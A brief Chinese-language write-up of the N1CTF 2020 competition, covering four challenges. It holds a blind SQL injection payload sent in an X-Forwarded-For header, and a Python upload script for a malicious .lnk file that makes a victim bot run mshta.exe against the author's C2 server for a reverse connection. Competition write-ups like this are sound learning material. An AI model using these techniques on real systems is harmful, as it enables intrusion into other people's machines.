N1CTF2020 WP
  • 2020-10-19


5f8d3eae1272c.png

艰难苟活 随便玩玩


web signln

X-Forwarded-For: 1'and 1=(if((select length((select `key` from n1key limit 0,1))>1),1,0)) and exp(~'n1ctf') and '1

The King of Phish(Victim Bot)

mshta打击 通过构造python脚本上传lnk文件使得目标机自动执行上线

import requests

if __name__ == '__main__':
	f = open('./test.lnk', 'rb')
	files = {"file": f}
	resp = requests.post("http://119.28.19.174:5000/send", files = files)
	print(resp.content.decode("utf8"))

lnk文件路径:mshta.exe http://C2服务器

成功反弹后在桌面拿到flag

OFLO


a = [0x4c,0x69,0x6e,0x75,0x78,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x20,0x34,0x20]
b = [0x35,0x2d,0x11,0x1a,0x49,0x7d,0x11,0x14,0x2b,0x3b,0x3e,0x3d,0x3c,0x5f]
flag = 'n1ctf'
for i in range(14):
    flag += chr((a[i]+2) ^ b[i])
print flag

N1egg

在Fixed Camera文件里面可以搜到flag